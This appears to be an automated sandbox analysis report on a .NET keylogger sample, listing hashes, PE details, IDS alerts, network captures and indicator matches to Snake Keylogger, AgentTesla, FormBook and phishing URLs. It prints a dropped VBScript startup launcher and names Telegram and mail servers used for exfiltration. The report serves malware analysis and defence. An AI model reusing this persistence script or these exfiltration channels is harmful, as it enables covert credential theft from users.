06:09:59  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | fw5476UX6g.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | C7fclY8IiM.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | oybsEA5EhR.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | TpHHp3vAuM.exe | malicious | CryptOne, Snake Keylogger |
149.154.167.220 | faz3VkyT7b.exe | malicious | MSIL Logger, MassLogger RAT |
149.154.167.220 | bddTkmucZP.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | ctTrvHxBXO.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | bc7hwStvUx.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | NifDAK5eSH.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | gID5oMWjq1.exe | malicious | Snake Keylogger, VIP Keylogger |
46.175.148.58 | G3uJOLisBq.exe | malicious | Snake Keylogger, VIP Keylogger |
46.175.148.58 | yxoY9FvULu.exe | malicious | AgentTesla |
46.175.148.58 | ShGhJDcXXI.exe | malicious | AgentTesla |
46.175.148.58 | wpo28029 Changzhou Tairun.exe | malicious | AgentTesla |
46.175.148.58 | gcXBQbWQ1p.exe | malicious | Snake Keylogger, VIP Keylogger |
46.175.148.58 | AmEZrFh7we.exe | malicious | Snake Keylogger, VIP Keylogger |
46.175.148.58 | 3SgC5vaFEg.exe | malicious | AgentTesla |
46.175.148.58 | SecuriteInfo.com.Win32.CrypterX-gen.27605.29739.exe | malicious | AgentTesla |
46.175.148.58 | PO 352995.exe | malicious | AgentTesla |
46.175.148.58 | Ningbo Overdue Invoice - JAN 23,2025.exe | malicious | AgentTesla |
104.21.96.1 | hh01FRs81x.exe | malicious | FormBook | www.newanthoperso.shop/3nis/?LL=4FHLH&R4lxS2-P=7Jez/f8BRsPhvFRcTYEfxOkzfWBvvrnmo+4qP8uldvbHjjygNPFvdo5E4tKnf+Ij1qWwstrtA/xMUYgdGo9Dw7YPXWw4NGSG4oy32mHU2IUoylmJFg==
104.21.96.1 | yloe82Jp1k.exe | malicious | FormBook | www.sigaque.today/n61y/
104.21.96.1 | A2h6QhZIKx.exe | malicious | Azorult | k1d5.icu/TP341/index.php
104.21.96.1 | DHL AWB Receipt_pdf.bat.exe | malicious | FormBook | www.rbopisalive.cyou/2dxw/
104.21.96.1 | r_BBVA_MensajeSWIFT04-03-2025-PDF.exe | malicious | FormBook | www.kdrqcyusevx.info/k7wl/
104.21.96.1 | MUH030425.exe | malicious | Azorult | k1d5.icu/TP341/index.php
104.21.96.1 | Invoice Remittance ref20250226.exe | malicious | FormBook | www.rbopisalive.cyou/a669/
104.21.96.1 | 368c6e62-b031-5b65-fd43-e7a610184138.eml | malicious | HTMLPhisher | ce60771026585.oakdiiocese.org/r/74?session=770558a25b5d1fcbb8d81f113631d430f5b8d022cdc6d97cf6b16a412a3be9e6
104.21.96.1 | PO.exe | malicious | Lokibot | touxzw.ir/sccc/five/fre.php
104.21.96.1 | OEoRzjI7JgSiUUd.exe | malicious | Lokibot | touxzw.ir/sss2/five/fre.php
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context (resolved IP)
reallyfreegeoip.org | hcy2SdW2z6.exe | malicious | Snake Keylogger | 104.21.96.1
reallyfreegeoip.org | fw5476UX6g.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
reallyfreegeoip.org | C7fclY8IiM.exe | malicious | GuLoader, Snake Keylogger | 104.21.112.1
reallyfreegeoip.org | oybsEA5EhR.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.48.1
reallyfreegeoip.org | TpHHp3vAuM.exe | malicious | CryptOne, Snake Keylogger | 104.21.32.1
reallyfreegeoip.org | faz3VkyT7b.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.64.1
reallyfreegeoip.org | REQ. NO.237.exe | malicious | Snake Keylogger | 104.21.96.1
reallyfreegeoip.org | bddTkmucZP.exe | malicious | GuLoader, Snake Keylogger | 104.21.80.1
reallyfreegeoip.org | ctTrvHxBXO.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
reallyfreegeoip.org | ZX0sNnKlqT.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.80.1
mail.iaa-airferight.com | G3uJOLisBq.exe | malicious | Snake Keylogger, VIP Keylogger | 46.175.148.58
mail.iaa-airferight.com | yxoY9FvULu.exe | malicious | AgentTesla | 46.175.148.58
mail.iaa-airferight.com | ShGhJDcXXI.exe | malicious | AgentTesla | 46.175.148.58
mail.iaa-airferight.com | wpo28029 Changzhou Tairun.exe | malicious | AgentTesla | 46.175.148.58
mail.iaa-airferight.com | gcXBQbWQ1p.exe | malicious | Snake Keylogger, VIP Keylogger | 46.175.148.58
mail.iaa-airferight.com | AmEZrFh7we.exe | malicious | Snake Keylogger, VIP Keylogger | 46.175.148.58
mail.iaa-airferight.com | 3SgC5vaFEg.exe | malicious | AgentTesla | 46.175.148.58
mail.iaa-airferight.com | SecuriteInfo.com.Win32.CrypterX-gen.27605.29739.exe | malicious | AgentTesla | 46.175.148.58
mail.iaa-airferight.com | PO 352995.exe | malicious | AgentTesla | 46.175.148.58
mail.iaa-airferight.com | Ningbo Overdue Invoice - JAN 23,2025.exe | malicious | AgentTesla | 46.175.148.58
api.telegram.org | fw5476UX6g.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | C7fclY8IiM.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | oybsEA5EhR.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | TpHHp3vAuM.exe | malicious | CryptOne, Snake Keylogger | 149.154.167.220
api.telegram.org | faz3VkyT7b.exe | malicious | MSIL Logger, MassLogger RAT | 149.154.167.220
api.telegram.org | bddTkmucZP.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | ctTrvHxBXO.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | bc7hwStvUx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | NifDAK5eSH.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | gID5oMWjq1.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    TELEGRAMRUfw5476UX6g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    C7fclY8IiM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    oybsEA5EhR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    TpHHp3vAuM.exeGet hashmaliciousCryptOne, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    faz3VkyT7b.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    bddTkmucZP.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    ctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    bc7hwStvUx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    NifDAK5eSH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    gID5oMWjq1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    ASLAGIDKOM-NETUAG3uJOLisBq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    yxoY9FvULu.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    ShGhJDcXXI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    wpo28029 Changzhou Tairun.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    gcXBQbWQ1p.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    AmEZrFh7we.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    3SgC5vaFEg.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    SecuriteInfo.com.Win32.CrypterX-gen.27605.29739.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    PO 352995.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    Ningbo Overdue Invoice - JAN 23,2025.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    ORACLE-BMC-31898UShcy2SdW2z6.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 193.122.6.168
C7fclY8IiM.exe | malicious | GuLoader, Snake Keylogger | 193.122.6.168
oybsEA5EhR.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
faz3VkyT7b.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.130.0
REQ. NO.237.exe | malicious | Snake Keylogger | 193.122.6.168
bddTkmucZP.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
ctTrvHxBXO.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
ZX0sNnKlqT.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.130.0
gC0avSHWrd.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
bc7hwStvUx.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
Match: CLOUDFLARENETUS
hcy2SdW2z6.exe | malicious | Snake Keylogger | 104.21.96.1
fw5476UX6g.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
C7fclY8IiM.exe | malicious | GuLoader, Snake Keylogger | 104.21.112.1
oybsEA5EhR.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.48.1
TpHHp3vAuM.exe | malicious | CryptOne, Snake Keylogger | 104.21.32.1
y27AF4qx0Q.exe | malicious | AgentTesla | 104.26.13.205
https://vuqdis5yetjpyqu38qzukbhmzmdn.pil.com.tr/newmoonsed/activitypery/loufewagophy/?email=script_kiddys@tryharder.com | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 104.18.95.41
f468369488.exe | malicious | Unknown | 172.64.41.3
faz3VkyT7b.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.64.1
REQ. NO.237.exe | malicious | Snake Keylogger | 104.21.96.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: 54328bd36c14bd82ddaa0c04b25ed9ad
hcy2SdW2z6.exe | malicious | Snake Keylogger | 104.21.96.1
fw5476UX6g.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
C7fclY8IiM.exe | malicious | GuLoader, Snake Keylogger | 104.21.96.1
oybsEA5EhR.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
TpHHp3vAuM.exe | malicious | CryptOne, Snake Keylogger | 104.21.96.1
faz3VkyT7b.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.96.1
REQ. NO.237.exe | malicious | Snake Keylogger | 104.21.96.1
bddTkmucZP.exe | malicious | GuLoader, Snake Keylogger | 104.21.96.1
ctTrvHxBXO.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
ZX0sNnKlqT.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.96.1

Match: 3b5074b1b5d032e5620f69f9f700ff0e
fw5476UX6g.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
C7fclY8IiM.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
oybsEA5EhR.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TpHHp3vAuM.exe | malicious | CryptOne, Snake Keylogger | 149.154.167.220
y27AF4qx0Q.exe | malicious | AgentTesla | 149.154.167.220
faz3VkyT7b.exe | malicious | MSIL Logger, MassLogger RAT | 149.154.167.220
bddTkmucZP.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
ctTrvHxBXO.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
nPqeSjgAQQ.exe | malicious | AgentTesla | 149.154.167.220
bc7hwStvUx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
No context

Process: C:\Users\user\Desktop\pbgjw8i8N7.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 83
Entropy (8bit): 4.8540896607743065
Encrypted: false
SSDEEP: 3:FER/n0eFHHoUkh4EaKC54xkAJHn:FER/lFHI9aZ54xkQ
MD5: 061D0A86AEDA15C377568F4B29BBAF18
SHA1: 837000CED0C724D9D9E4435B8DEC8F9D9D66DE0D
SHA-256: E07469C6D38C6555ECA0663828E9AE9096CB6F2DCD4AF5005B1A5BFFF2BAAE51
SHA-512: F527B876A4BE2E0EFED2385FA4C19CC58729A95E39C5AC32A09B014FA5EB1233EFC467655DAE802245440FD99A80873F1B385694A67B09FB7E909CE9070A15AA
Malicious: true
Reputation: low
Preview: CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\XsdType.exe"""

Process: C:\Users\user\Desktop\pbgjw8i8N7.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 2034176
Entropy (8bit): 7.188926297239984
Encrypted: false
SSDEEP: 24576:SUeQg2PvNPjxiF1LeVFJ03GDJuwAP3OED/NSq66+0wZPK8FbqFnAYJytaEVarmmI:tNrxiHUJK8lAP3vD/A0uC8tBcytaeXd
MD5: 679DA76A671452DE2F13A1585028E74E
SHA1: E89C5B5D3B31025710714C14955D22820E2ED493
SHA-256: 44095F79A9E682A29ED75FAB33F6DCF1E2F11937097E4C7E3F84080FF7444048
SHA-512: E21D43F7BBFD77CE1FDCCF438655385EE1EFD026F29ADBA0C1E979186DE0B28B8495C97ED4E89B9324D484B0DB4CE9C9E5D29964D4DF395BE54F6477D086959C
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Virustotal, Detection: 70%
• Antivirus: ReversingLabs, Detection: 63%
Reputation: low

Process: C:\Users\user\Desktop\pbgjw8i8N7.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Reputation: high, very likely benign file
Preview: [ZoneTransfer]....ZoneId=0

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.188926297239984
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: pbgjw8i8N7.exe
File size: 2'034'176 bytes
MD5: 679da76a671452de2f13a1585028e74e
SHA1: e89c5b5d3b31025710714c14955d22820e2ed493
SHA256: 44095f79a9e682a29ed75fab33f6dcf1e2f11937097e4c7e3f84080ff7444048
SHA512: e21d43f7bbfd77ce1fdccf438655385ee1efd026f29adba0c1e979186de0b28b8495c97ed4e89b9324d484b0db4ce9c9e5d29964d4df395be54f6477d086959c
SSDEEP: 24576:SUeQg2PvNPjxiF1LeVFJ03GDJuwAP3OED/NSq66+0wZPK8FbqFnAYJytaEVarmmI:tNrxiHUJK8lAP3vD/A0uC8tBcytaeXd
TLSH: 2A957D0BF79A47A1D274573EC8AB081CA3A4E58267D3DF1E374A235908E37BB8D41617
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<U.g................................. ... ....@.. .......................`............`................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x5f1e9e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x67B7553C [Thu Feb 20 16:15:56 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                    Instruction
                                                                                                                                                                    jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1f1e50 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1f2000 | 0x598 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1f4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x1efea4 | 0x1f0000 | d03b9bac6ae442dab3dbcb8283e6b212 | False | 0.7072488107988911 | data | 7.19209181797832 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x1f2000 | 0x598 | 0x600 | a728d9befd81068fd0b723357e4d78c7 | False | 0.4147135416666667 | data | 4.067971838205649 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1f4000 | 0xc | 0x200 | 076cee7609f3daeac8d8b0882acc6e9f | False | 0.044921875 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "\037" | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x1f20a0 | 0x30c | data | | | 0.4256410256410256
RT_MANIFEST | 0x1f23ac | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
Comments |
CompanyName |
FileDescription | Jurfzqn
FileVersion | 1.0.0.0
InternalName | Jurfzqn.exe
LegalCopyright | Copyright 2017
LegalTrademarks |
OriginalFilename | Jurfzqn.exe
ProductName | Jurfzqn
ProductVersion | 1.0.0.0
Assembly Version | 1.0.0.0
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-11T06:09:59.024815+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49712 | 158.101.44.242 | 80 | TCP
2025-03-11T06:10:04.872621+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49712 | 158.101.44.242 | 80 | TCP
2025-03-11T06:10:07.153657+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49714 | 104.21.96.1 | 443 | TCP
2025-03-11T06:10:16.717744+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49715 | 158.101.44.242 | 80 | TCP
2025-03-11T06:10:18.915468+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49719 | 104.21.96.1 | 443 | TCP
2025-03-11T06:10:24.107212+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49716 | 158.101.44.242 | 80 | TCP
2025-03-11T06:10:27.857004+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49716 | 158.101.44.242 | 80 | TCP
2025-03-11T06:10:30.004518+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49726 | 104.21.96.1 | 443 | TCP
2025-03-11T06:10:30.716397+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49728 | 158.101.44.242 | 80 | TCP
2025-03-11T06:10:34.050375+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49729 | 104.21.96.1 | 443 | TCP
2025-03-11T06:10:45.740940+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.5 | 49745 | 149.154.167.220 | 443 | TCP
2025-03-11T06:10:49.188792+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49748 | 104.21.96.1 | 443 | TCP
2025-03-11T06:10:52.152063+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49750 | 104.21.96.1 | 443 | TCP
2025-03-11T06:10:54.564569+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.5 | 49753 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 11, 2025 06:09:58.196594000 CET | 49712 | 80 | 192.168.2.5 | 158.101.44.242
Mar 11, 2025 06:09:58.201539040 CET | 80 | 49712 | 158.101.44.242 | 192.168.2.5
Mar 11, 2025 06:09:58.201631069 CET | 49712 | 80 | 192.168.2.5 | 158.101.44.242
Mar 11, 2025 06:09:58.201845884 CET | 49712 | 80 | 192.168.2.5 | 158.101.44.242
Mar 11, 2025 06:09:58.206703901 CET | 80 | 49712 | 158.101.44.242 | 192.168.2.5
Mar 11, 2025 06:09:58.804289103 CET | 80 | 49712 | 158.101.44.242 | 192.168.2.5
Mar 11, 2025 06:09:58.809731007 CET | 49712 | 80 | 192.168.2.5 | 158.101.44.242
Mar 11, 2025 06:09:58.814605951 CET | 80 | 49712 | 158.101.44.242 | 192.168.2.5
Mar 11, 2025 06:09:58.969089031 CET | 80 | 49712 | 158.101.44.242 | 192.168.2.5
Mar 11, 2025 06:09:59.024815083 CET | 49712 | 80 | 192.168.2.5 | 158.101.44.242
Mar 11, 2025 06:09:59.184804916 CET | 49713 | 443 | 192.168.2.5 | 104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:09:59.184845924 CET44349713104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:09:59.184916973 CET49713443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:09:59.195746899 CET49713443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:09:59.195763111 CET44349713104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:01.023005009 CET44349713104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:01.023175001 CET49713443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:01.028198004 CET49713443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:01.028213978 CET44349713104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:01.028573990 CET44349713104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:01.075717926 CET49713443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:01.098586082 CET49713443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:01.144330025 CET44349713104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:01.514763117 CET44349713104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:01.514834881 CET44349713104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:01.514961958 CET49713443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:01.536267996 CET49713443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:01.540587902 CET4971280192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:01.545878887 CET8049712158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:04.818378925 CET8049712158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:04.851866007 CET49714443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:04.851918936 CET44349714104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:04.851999998 CET49714443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:04.852268934 CET49714443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:04.852287054 CET44349714104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:04.872621059 CET4971280192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:06.655890942 CET44349714104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:06.658418894 CET49714443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:06.658446074 CET44349714104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:07.153671026 CET44349714104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:07.187417984 CET44349714104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:07.187485933 CET49714443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:07.187844038 CET49714443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:07.191013098 CET4971280192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:07.192315102 CET4971580192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:07.195959091 CET8049712158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:07.196023941 CET4971280192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:07.197169065 CET8049715158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:07.197247028 CET4971580192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:07.197340012 CET4971580192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:07.202102900 CET8049715158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:10.489057064 CET4971680192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:10.494088888 CET8049716158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:10.494184017 CET4971680192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:10.494441032 CET4971680192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:10.499280930 CET8049716158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:16.672739983 CET8049715158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:16.674268961 CET49719443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:16.674312115 CET44349719104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:16.674541950 CET49719443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:16.674657106 CET49719443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:16.674668074 CET44349719104.21.96.1192.168.2.5
